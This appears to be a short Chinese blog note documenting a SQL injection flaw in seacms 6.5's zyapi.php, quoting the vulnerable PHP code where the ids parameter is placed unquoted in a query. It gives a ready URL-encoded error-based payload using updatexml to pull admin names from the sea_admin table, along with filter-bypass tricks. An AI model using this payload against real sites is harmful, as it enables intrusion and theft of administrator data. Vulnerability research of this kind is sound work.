seacms6.5 注入漏洞1

---恢复内容开始---

需要开启/data/admin/isapi.txt   ，当里面的数值为1时，就可以报错注入

存在漏洞的页面：zyapi.php

function cj()
{
	global $dsql,$rtype,$rpage,$rkey,$rday,$action,$app_apiver,$app_apipagenum,$cfg_basehost,$ids;
	$xmla = "<?xml version=\"1.0\" encoding=\"utf-8\"?>";
	$xmla .= "<rss version=\"".$app_apiver."\">";
 
	$sql = "select d.*,p.body as v_playdata,p.body1 as v_playdata1,t.tname from sea_data d left join `sea_type` t on t.tid=d.tid left join `sea_playdata` p on p.v_id=d.v_id where d.v_recycled=0 ";
	$sql1 = "select count(*) as dd from sea_data where v_recycled=0 ";
 
	if($ids!=""){
		$ids = addslashes($ids);
		$sql .= " AND d.v_id in (". $ids .")";
		$sql1 .= " AND v_id in (". $ids .")";
	}

　　

$ids没加引号。get方式

payload：

/zyapi.php?ac=videolist&ids=1%29and%0b1%3D%40%60%27%60%0band%0b%28updatexml%281%2Cconcat%23%0a%281%2C%28select%0b%7Bx+name%7D%0bfrom%0bsea_admin%29%29%2C1%29%29and%0b1%3D%40%60%27%60%0band%0b%280.1%3D0.1

入库以后有句话，可把我难受死了，最后用+和%0b 来绕过。折腾了好久，下次要记住了。

if(!m_eregi("limit",$sql)) $this->SetQuery(m_eregi_replace("[,;]$",'',trim($sql))." limit 0,1;");

　　

---恢复内容结束---